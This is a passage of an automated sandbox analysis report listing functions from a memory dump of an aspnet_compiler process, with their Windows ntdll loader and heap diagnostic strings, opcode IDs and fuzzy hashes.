                                                                                                        • Instruction Fuzzy Hash: 7E9168B1548345AFE722EF25CC84FABFAECBF84744F40092EFA8496155E734D9448B62
                                                                                                        Function 017864AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 017E1028
                                                                                                        • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 017E10AE
                                                                                                        • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 017E106B
                                                                                                        • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 017E0FE5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                        • API String ID: 0-1468400865
                                                                                                        • Opcode ID: 983f8810eeda5fbf62976f25f2bb8a6d7af4cb56faf5f295c4eddeeccff8a1cd
                                                                                                        • Instruction ID: 08c2ca69a4d61ce540f2926bbed452cd2589dc28a40a2e71fc23df7a1b055e76
                                                                                                        • Opcode Fuzzy Hash: 983f8810eeda5fbf62976f25f2bb8a6d7af4cb56faf5f295c4eddeeccff8a1cd
                                                                                                        • Instruction Fuzzy Hash: 0D71C4B1544305AFCB21EF18C889B9BBFE8AF54754F54046CF9488B14AD774D588CBE2
                                                                                                        Function 018311A4 Relevance: 5.1, Strings: 4, Instructions: 113COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                                                                        • API String ID: 0-336120773
                                                                                                        • Opcode ID: 362a80623bf95b3197735e6f66d1bc7023a7170349465c30fa08f4254482924a
                                                                                                        • Instruction ID: f06a469b89c1770f6d2fb1cb22af60ca3e30d3b815980c908191ce0506c3c79a
                                                                                                        • Opcode Fuzzy Hash: 362a80623bf95b3197735e6f66d1bc7023a7170349465c30fa08f4254482924a
                                                                                                        • Instruction Fuzzy Hash: AB31F2B1200105EFDB51DB98C88DF66B7E8EF44B64F190059F515CB291EA71EE40CBA5
                                                                                                        Function 017A245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        • apphelp.dll, xrefs: 017A2462
                                                                                                        • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 017EA992
                                                                                                        • LdrpDynamicShimModule, xrefs: 017EA998
                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 017EA9A2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                        • API String ID: 0-176724104
                                                                                                        • Opcode ID: f7846a511852caee0863607288eb4f4b6f2ac284b1d9ddae3aad9c69e34d1c2f
                                                                                                        • Instruction ID: c41881ed7ae66300246ec61bbd860b812123a709ee4584bc3a720a54673bde2f
                                                                                                        • Opcode Fuzzy Hash: f7846a511852caee0863607288eb4f4b6f2ac284b1d9ddae3aad9c69e34d1c2f
                                                                                                        • Instruction Fuzzy Hash: C2311675A00301ABDB319F5D988DABAF7F5FB88714F260159F900A7259D7709A41CB81
                                                                                                        Function 01779148 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                                                        • API String ID: 0-1391187441
                                                                                                        • Opcode ID: 5258c9d68e5f9e1254042e2e6776d04c4787a821a2d4ffb471cefd92c7bd0ddb
                                                                                                        • Instruction ID: 89e93d8de083634cf5f205c21b1f36d90a2238a2ef946d94caccbe9e02885b28
                                                                                                        • Opcode Fuzzy Hash: 5258c9d68e5f9e1254042e2e6776d04c4787a821a2d4ffb471cefd92c7bd0ddb
                                                                                                        • Instruction Fuzzy Hash: 0331B272600209EFCB11DB59CC88FAAFBB8EF45B74F154059F914A7291D770ED40CA61
                                                                                                        Function 018294E0 Relevance: 4.3, Strings: 3, Instructions: 558COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $ $0
                                                                                                        • API String ID: 0-3352262554
                                                                                                        • Opcode ID: 4390448928231f9fb3fd5b74dd2b02182b6451d35e23ecf996b50a16e55c6ebb
                                                                                                        • Instruction ID: c206d11e6240b670a2994ef031c551a5c11b63e02f1ef9e2f1663d6a0e09049f
                                                                                                        • Opcode Fuzzy Hash: 4390448928231f9fb3fd5b74dd2b02182b6451d35e23ecf996b50a16e55c6ebb
                                                                                                        • Instruction Fuzzy Hash: E53215B1A083618FE721CF68C484B5BBBE5BF88318F04492EF599C7251D775DA88CB52
                                                                                                        Function 01790770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                        • API String ID: 0-4253913091
                                                                                                        • Opcode ID: 9b00a4a7a55ca337838aaee393cc1a61290ff64343832cfdb03134136131f709
                                                                                                        • Instruction ID: 3230d2d0c9029708b7ff6fddd0d214ef55cfbb05809193df59f660e40632609d
                                                                                                        • Opcode Fuzzy Hash: 9b00a4a7a55ca337838aaee393cc1a61290ff64343832cfdb03134136131f709
                                                                                                        • Instruction Fuzzy Hash: 91F1BC74A1060ADFEB15CF68D888B6AF7F9FF48304F1441A8E5169B381D734EA85CB91
                                                                                                        Function 01781460 Relevance: 4.1, Strings: 3, Instructions: 385COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        • HEAP: , xrefs: 01781596
                                                                                                        • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 01781728
                                                                                                        • HEAP[%wZ]: , xrefs: 01781712
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                        • API String ID: 0-3178619729
                                                                                                        • Opcode ID: 27d50cda46e458c38eb9f9299b290d2ec30cae8a96c24425c132c91346b9a0c7
                                                                                                        • Instruction ID: d45e77efa8016795edf9609366c6da24166ea45fefb24aa54392a1bf77dfdd7f
                                                                                                        • Opcode Fuzzy Hash: 27d50cda46e458c38eb9f9299b290d2ec30cae8a96c24425c132c91346b9a0c7
                                                                                                        • Instruction Fuzzy Hash: 7EE1F070A042469FDB29DF2CC491BBAFBF1AF44314F58849DE996CB246E734E942CB50
                                                                                                        Function 0177A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: FilterFullPath$UseFilter$\??\
                                                                                                        • API String ID: 0-2779062949
                                                                                                        • Opcode ID: c3bb5baea54a28f55c2af00a1e21f0ea4f5c009dbcaf3c47c428d6957bd0a6ae
                                                                                                        • Instruction ID: 91b6065c4619dc4e6915d56b9013756e615a1e4caff6a8daafc081d958903a32
                                                                                                        • Opcode Fuzzy Hash: c3bb5baea54a28f55c2af00a1e21f0ea4f5c009dbcaf3c47c428d6957bd0a6ae
                                                                                                        • Instruction Fuzzy Hash: 63A15B719116299BDF32DF68CC88BAAF7B8EF44710F1501E9E909A7250EB359E84CF50
                                                                                                        Function 0178B440 Relevance: 4.0, Strings: 3, Instructions: 221COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                                                                                        • API String ID: 0-373624363
                                                                                                        • Opcode ID: 8f0af72a373fc046e93c5cba52f5e97f235a43d71dd9491a361bef137f6d0c92
                                                                                                        • Instruction ID: 70c8f032fe47fbf800f7496a05aab1a14007f8d5af7266f045c9c30d4bec71b2
                                                                                                        • Opcode Fuzzy Hash: 8f0af72a373fc046e93c5cba52f5e97f235a43d71dd9491a361bef137f6d0c92
                                                                                                        • Instruction Fuzzy Hash: 3491C371A84209CFEB21DF98C494BEEFBF0FF05314F244195E915AB291D7789A41CBA1
                                                                                                        Function 017B909C Relevance: 3.9, Strings: 3, Instructions: 199COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: %$&$@
                                                                                                        • API String ID: 0-1537733988
                                                                                                        • Opcode ID: 057fd5dd2b5d5c6f68843b1868db6266f9d13f0339de6a315ffc2cf3f30f77bd
                                                                                                        • Instruction ID: e8106bc2caf422ce2c83bc705a8f7fdf0cb4663e4ddcf63ae60a7452056f7a26
                                                                                                        • Opcode Fuzzy Hash: 057fd5dd2b5d5c6f68843b1868db6266f9d13f0339de6a315ffc2cf3f30f77bd
                                                                                                        • Instruction Fuzzy Hash: C471ADB09083069FC714DF28C5C4BABFBE5BF84618F108A1DE7AA87291D730D905CB92
                                                                                                        Function 017A15F4 Relevance: 3.9, Strings: 3, Instructions: 166COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        • LdrpCompleteMapModule, xrefs: 017EA590
                                                                                                        • Could not validate the crypto signature for DLL %wZ, xrefs: 017EA589
                                                                                                        • minkernel\ntdll\ldrmap.c, xrefs: 017EA59A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                                                        • API String ID: 0-1676968949
                                                                                                        • Opcode ID: 2aed54298a5a46a741685b705781150fd7bd601e89ab33b2fd8866b500514a73
                                                                                                        • Instruction ID: f723d8c611f9b78f65417af4ecdfb0e4aec57e71fc912dddf2ec73b4f6511459
                                                                                                        • Opcode Fuzzy Hash: 2aed54298a5a46a741685b705781150fd7bd601e89ab33b2fd8866b500514a73
                                                                                                        • Instruction Fuzzy Hash: 6B5105706007459BFB22CF5CC958B26FBE4BF84764F9802A4EA51DB6D2CB74E940CB41
                                                                                                        Function 0177758F Relevance: 3.9, Strings: 3, Instructions: 132COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                                                                        • API String ID: 0-1151232445
                                                                                                        • Opcode ID: af8b0d98858525756839cfe0ee9ad2419e7b306412331c34826a39d0fbcd2141
                                                                                                        • Instruction ID: 5cbc38810e6e5f151a7cc290b6416c3527e2c200205039f07fbb48cee850b001
                                                                                                        • Opcode Fuzzy Hash: af8b0d98858525756839cfe0ee9ad2419e7b306412331c34826a39d0fbcd2141
                                                                                                        • Instruction Fuzzy Hash: 1541B3B03012848FEF29CA6DC498B79FBB1AF01344F1844E9D546DB69AD674D885CB51
                                                                                                        Function 0183C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        • @, xrefs: 0183C1F1
                                                                                                        • PreferredUILanguages, xrefs: 0183C212
                                                                                                        • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0183C1C5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                        • API String ID: 0-2968386058
                                                                                                        • Opcode ID: b1a26ca9096a53071ad479ed56811032aaf03d9227dd50368dd94a1468187b39
                                                                                                        • Instruction ID: 51b83a5eb0478fbc4da4705649ca87902b753e8e2aa347b3c09419b9c03531d5
                                                                                                        • Opcode Fuzzy Hash: b1a26ca9096a53071ad479ed56811032aaf03d9227dd50368dd94a1468187b39
                                                                                                        • Instruction Fuzzy Hash: 7E414272A00219ABDF11DED8C855BEEFBB8AB94704F14416BEA09F7244D7749B448B90
                                                                                                        Function 01814144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                        • API String ID: 0-1373925480
                                                                                                        • Opcode ID: 4d187b1445079272a1e4537c3dbb95c5dce3733c030c3ebf32746416b2f87927
                                                                                                        • Instruction ID: 1357c786e2761fbd1fdf02fb2e7dd0a8ee640190dc00f7e669a9d53dfeea17a9
                                                                                                        • Opcode Fuzzy Hash: 4d187b1445079272a1e4537c3dbb95c5dce3733c030c3ebf32746416b2f87927
                                                                                                        • Instruction Fuzzy Hash: 85412372A00658CBEB26DBE8C844BEDBBBCFF55344F24045AD901EB789DB348A41CB51
                                                                                                        Function 017B33A0 Relevance: 3.9, Strings: 3, Instructions: 111COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        • SXS: %s() passed the empty activation context data, xrefs: 017F29FE
                                                                                                        • RtlCreateActivationContext, xrefs: 017F29F9
                                                                                                        • Actx , xrefs: 017B33AC
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                                                                        • API String ID: 0-859632880
                                                                                                        • Opcode ID: 58d20a43de589f6dbeabb5c8fd69763db0cb2b6bb226eb603befc06d55743fbf
                                                                                                        • Instruction ID: df6e38c4130f08df02c0cd68efff75389f69031774260b39ffb93b21ddd80287
                                                                                                        • Opcode Fuzzy Hash: 58d20a43de589f6dbeabb5c8fd69763db0cb2b6bb226eb603befc06d55743fbf
                                                                                                        • Instruction Fuzzy Hash: 023124322003059FEB22DE58D8C4FA7BBA4BB44710F154469EE04DF386D774E985CB90
                                                                                                        Function 0180B594 Relevance: 3.9, Strings: 3, Instructions: 107COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        • GlobalFlag, xrefs: 0180B68F
                                                                                                        • @, xrefs: 0180B670
                                                                                                        • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 0180B632
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                                                                        • API String ID: 0-4192008846
                                                                                                        • Opcode ID: 890cb2a335a734f2b48c4fb9216e03c9a06cf51cfe298c257c71c71f26d11941
                                                                                                        • Instruction ID: 267d164ace98dc9a48be52732ac991afb485a3d34aa06734492cd128ccde9c92
                                                                                                        • Opcode Fuzzy Hash: 890cb2a335a734f2b48c4fb9216e03c9a06cf51cfe298c257c71c71f26d11941
                                                                                                        • Instruction Fuzzy Hash: 18314BB5A0020DAFEB51EFA5CC84AEEBB7CEF44744F140469E615E6281D7749F40CBA4
                                                                                                        Function 017C1270 Relevance: 3.8, Strings: 3, Instructions: 97COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        • @, xrefs: 017C12A5
                                                                                                        • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 017C127B
                                                                                                        • BuildLabEx, xrefs: 017C130F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                        • API String ID: 0-3051831665
                                                                                                        • Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                                                                        • Instruction ID: 90811853c5f0f211f3a2aaf3cd2073516e44a66cee1472b24313d5bdd87d18d4
                                                                                                        • Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                                                                        • Instruction Fuzzy Hash: 04319072A00519EFDB12AFA5CC48EDEFFB9EB94B14F00402DE614A7261E7309A05DB50
                                                                                                        Function 018020DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        • Process initialization failed with status 0x%08lx, xrefs: 018020F3
                                                                                                        • LdrpInitializationFailure, xrefs: 018020FA
                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 01802104
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                        • API String ID: 0-2986994758
                                                                                                        • Opcode ID: 73d7002c2cefb4f6acffa430a223b5035d73256f001665049bbab53f8b4a5b0c
                                                                                                        • Instruction ID: 527b4f2ced2dcf95cfacb0cd5fd21bbd23ff663190f419a25039a57a610c2cd5
                                                                                                        • Opcode Fuzzy Hash: 73d7002c2cefb4f6acffa430a223b5035d73256f001665049bbab53f8b4a5b0c
                                                                                                        • Instruction Fuzzy Hash: 14F0C875640309AFE765E64CCC5AF99B76DEB80B54F50006DFA40B72C5D6F0AB00CA92
                                                                                                        Function 017903E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ___swprintf_l
                                                                                                        • String ID: #%u
                                                                                                        • API String ID: 48624451-232158463
                                                                                                        • Opcode ID: b519b90107834242e6b8fcc80670d1bf1b86d35835ca6fe8503a20e71d07cf08
                                                                                                        • Instruction ID: 05a8c66097b641cd0e1fa56e8fa6a6d99344c2c838caddeb3e8b27f710df4e62
                                                                                                        • Opcode Fuzzy Hash: b519b90107834242e6b8fcc80670d1bf1b86d35835ca6fe8503a20e71d07cf08
                                                                                                        • Instruction Fuzzy Hash: 7F715A71A0014A9FDF01DFA8D998FAEB7F8BF08744F144069E905E7255EA34EE45CBA0
                                                                                                        Function 017952A0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: @$@
                                                                                                        • API String ID: 0-149943524
                                                                                                        • Opcode ID: 8703c35cb2a1abc39a50f4b0ca5d6a7fa2c554ee0e361b953ff6852b0a60535d
                                                                                                        • Instruction ID: cefc6b9fc361c8de4914ca5b7fa2add6e95df5a9da4c12b592cf6edc20ddba45
                                                                                                        • Opcode Fuzzy Hash: 8703c35cb2a1abc39a50f4b0ca5d6a7fa2c554ee0e361b953ff6852b0a60535d
                                                                                                        • Instruction Fuzzy Hash: 2D328F705083218BDB25CF19D484B3EFBE1EF98B44F14491EFA959B2A0E734D948CB92
                                                                                                        Function 0184A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: `$`
                                                                                                        • API String ID: 0-197956300
                                                                                                        • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                        • Instruction ID: b9729dcb1d4d6edc40ef19415d358baa43517ff9bb162d0f29f8a45940a509cc
                                                                                                        • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                        • Instruction Fuzzy Hash: 21C1F53124434A9BE728CF28C845B6BBBE5BFD4318F044A2DF696CB291DB75D605CB81
                                                                                                        Function 017804E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0178063D
                                                                                                        • kLsE, xrefs: 01780540
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                        • API String ID: 0-2547482624
                                                                                                        • Opcode ID: 88f71ad92e012d27f5c534e19caeeb5f721fa8b872adea97da17291fd84f58e3
                                                                                                        • Instruction ID: 9ee0d0238aa5bfee99ed27bda284541d17df96b6a30e7492d3897a89a3707da8
                                                                                                        • Opcode Fuzzy Hash: 88f71ad92e012d27f5c534e19caeeb5f721fa8b872adea97da17291fd84f58e3
                                                                                                        • Instruction Fuzzy Hash: E851AF716447428FD724FF68C544AA7FBE4AF84314F24483EFAAA87241E770D549CBA2
                                                                                                        Function 0178A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        • RtlpResUltimateFallbackInfo Exit, xrefs: 0178A309
                                                                                                        • RtlpResUltimateFallbackInfo Enter, xrefs: 0178A2FB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                        • API String ID: 0-2876891731
                                                                                                        • Opcode ID: a27d374f3ed0e8aabadb1d8cbacb2e77e74426c89f66d36e46a04c10f4b15aaf
                                                                                                        • Instruction ID: 893411523032e6cfa228e892066b9667228e0c976c58d238d8aaef42333f915d
                                                                                                        • Opcode Fuzzy Hash: a27d374f3ed0e8aabadb1d8cbacb2e77e74426c89f66d36e46a04c10f4b15aaf
                                                                                                        • Instruction Fuzzy Hash: 9B41AF30A44649DBDB22DF6DC844B6DFBF4FF84700F2440AAE904DB692E6B5D940CB50
                                                                                                        Function 018135BA Relevance: 2.6, Strings: 2, Instructions: 99COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                                                                        • API String ID: 0-118005554
                                                                                                        • Opcode ID: 75bc36f08b0dc8c8422447e7aa7ca2c22067f01a90577fa603f06c48a3219d13
                                                                                                        • Instruction ID: 9829a848650ec13873c12803fa4546bf68faf3191cce2bf468dc47df783b462b
                                                                                                        • Opcode Fuzzy Hash: 75bc36f08b0dc8c8422447e7aa7ca2c22067f01a90577fa603f06c48a3219d13
